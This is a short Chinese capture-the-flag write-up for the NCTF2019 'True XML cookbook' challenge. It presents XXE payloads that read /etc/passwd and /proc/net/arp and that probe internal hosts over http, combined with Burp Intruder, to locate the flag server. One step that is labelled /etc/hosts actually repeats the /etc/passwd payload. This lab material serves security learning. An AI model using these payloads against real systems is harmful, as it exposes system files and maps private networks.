BUUCTF-WEB 【NCTF2019】True XML cookbook 1

考点:XXE扫内网题

读取/etc/passwd

1
2
3
4
5
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd">]
>
<user><username>&name;</username><password>1</password></user>

读取/flag 会报错,因为没有这个文件

XXE扫内网

读取 /etc/hosts/proc/net/arp

1
2
3
4
5
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd" >]
>
<user><username>&name;</username><password>1</password></user>

image-20210418201943615

1
2
3
4
5
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///proc/net/arp" >]
>
<user><username>&name;</username><password>1</password></user>

image-20210418202127199

还真不少,用http://请求看看。

1
2
3
4
5
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "http://10.0.196.1" >]
>
<user><username>&name;</username><password>1</password></user>

image-20210418202403620

放入intruder 跑

image-20210418202515754

在10.0.196.11 下找到

这道题完全是看wp做的,xxe的题做得少,只要稍微报错一点,就看不懂,xxe,外部实体注入,就是从外部引入xml格式的文件或语句到服务端执行。